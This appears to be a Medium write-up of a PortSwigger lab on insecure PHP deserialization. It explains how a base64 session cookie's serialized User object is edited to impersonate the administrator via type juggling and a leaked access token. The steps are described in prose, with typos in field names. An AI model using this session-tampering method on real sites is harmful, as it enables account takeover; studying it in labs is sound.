Portswigger Insecure Deserialization — Lab 2

Modifying serialized data types

In this lab we need to modify the serialized session which is vulnerable to authentication bypass through which we can get access to administrator account

We can login as wiener with the given password peter

The session cookie can be accessed from developer tools which is base64 encoded

To understand what’s happening in serialized cookie here,

  • O:4 represents the object user which is length of 4 and has two attributes 2 which are username and acces_token -s:8 represents the username attribute of string type having length of 8 which has the key value winener of string data type having length of 6
  • s:12 represents the acess_token of string type having length of 12 which has key value of string data type of length 32

We can try replacing the session cookie with the username admnistrator also we should edit the length of string also we can try performing php loose comparison which is comparing string with an integer value 0

https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf

On replacing the token we’ll see an error message which will reveal some access tokens and there are 3 tokens so they are probably for carlos, wiener and administrator

We can try using these tokens from which only vxdtpdwjbj8mhrubuejx0b2dqi8o1ky8 token worked for administrator

Now we can delete the carlos user and complete this lab

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store